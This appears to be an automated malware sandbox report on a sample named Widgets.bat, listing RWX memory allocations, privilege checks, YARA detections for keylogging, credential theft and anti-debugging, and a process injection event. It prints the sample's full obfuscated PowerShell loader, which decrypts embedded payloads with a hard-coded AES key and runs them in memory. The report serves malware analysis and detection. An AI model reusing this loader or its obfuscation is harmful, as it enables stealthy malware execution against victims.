NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05027000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05028000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05029000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0502a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0502b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0502c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0502d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0502e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0502f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05031000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:07 p.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Widgets.bat

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 14, 2023, 5:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (50 out of 62 events)

description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Steal credential	rule	local_credential_Steal
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Communications over P2P network	rule	Network_P2P_Win
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Escalate priviledges	rule	Escalate_priviledges
description	File Downloader	rule	Network_Downloader
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Take ScreenShot	rule	ScreenShot
description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Steal credential	rule	local_credential_Steal
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Communications over P2P network	rule	Network_P2P_Win
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Escalate priviledges	rule	Escalate_priviledges
description	File Downloader	rule	Network_Downloader
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active

Uses Windows utilities for basic Windows functionality (2 events)

cmdline

"C:\Users\test22\AppData\Local\Temp\Widgets.bat.exe" -w hidden -c $TXfY='ReaLBTjdLLBTjinLBTjesLBTj'.Replace('LBTj', '');$TIFx='TrLBTjaLBTjnsfLBTjorLBTjmFiLBTjnLBTjalBlLBTjocLBTjkLBTj'.Replace('LBTj', '');$dnCj='ChaLBTjngeELBTjxtenLBTjsioLBTjnLBTj'.Replace('LBTj', '');$geEm='EleLBTjmeLBTjntLBTjAtLBTj'.Replace('LBTj', '');$wHCj='FrLBTjomLBTjBaseLBTj64SLBTjtLBTjrLBTjiLBTjnLBTjgLBTj'.Replace('LBTj', '');$AqWy='InLBTjvoLBTjkLBTjeLBTj'.Replace('LBTj', '');$CrqW='CrLBTjeatLBTjeDecLBTjryLBTjptoLBTjrLBTj'.Replace('LBTj', '');$khtm='GeLBTjtCLBTjuLBTjrrLBTjentPLBTjrocLBTjessLBTj'.Replace('LBTj', '');$KwrX='EnLBTjtryLBTjPoLBTjiLBTjntLBTj'.Replace('LBTj', '');$fieb='LLBTjoaLBTjdLBTj'.Replace('LBTj', '');$HiPp='SLBTjplLBTjitLBTj'.Replace('LBTj', '');$vlrA='MLBTjaiLBTjnModLBTjulLBTjeLBTj'.Replace('LBTj', '');function fRRPh($DnQua){$CjZvd=[System.Security.Cryptography.Aes]::Create();$CjZvd.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CjZvd.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CjZvd.Key=[System.Convert]::$wHCj('1miXrhhJhMlPNZf234BClG8WEdSEXKgCHPhV8YIU61Y=');$CjZvd.IV=[System.Convert]::$wHCj('KhKlhfyzOoIJAJ+933W5sA==');$baAva=$CjZvd.$CrqW();$hPGap=$baAva.$TIFx($DnQua,0,$DnQua.Length);$baAva.Dispose();$CjZvd.Dispose();$hPGap;}function uDQIQ($DnQua){$FXPtQ=New-Object System.IO.MemoryStream(,$DnQua);$rDgyg=New-Object System.IO.MemoryStream;$oYczS=New-Object System.IO.Compression.GZipStream($FXPtQ,[IO.Compression.CompressionMode]::Decompress);$oYczS.CopyTo($rDgyg);$oYczS.Dispose();$FXPtQ.Dispose();$rDgyg.Dispose();$rDgyg.ToArray();}$ZZlcK=[System.Linq.Enumerable]::$geEm([System.IO.File]::$TXfY([System.IO.Path]::$dnCj([System.Diagnostics.Process]::$khtm().$vlrA.FileName, $null)), 1);$ypoNV=$ZZlcK.Substring(2).$HiPp(':');$hFCAj=uDQIQ (fRRPh ([Convert]::$wHCj($ypoNV[0])));$WShQc=uDQIQ (fRRPh ([Convert]::$wHCj($ypoNV[1])));[System.Reflection.Assembly]::$fieb([byte[]]$WShQc).$KwrX.$AqWy($null,$null);[System.Reflection.Assembly]::$fieb([byte[]]$hFCAj).$KwrX.$AqWy($null,$null);

cmdline

C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Widgets.bat

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2200 resumed a thread in remote process 196
NtResumeThread May 14, 2023, 5:07 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 196	1	0	0

Widgets.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All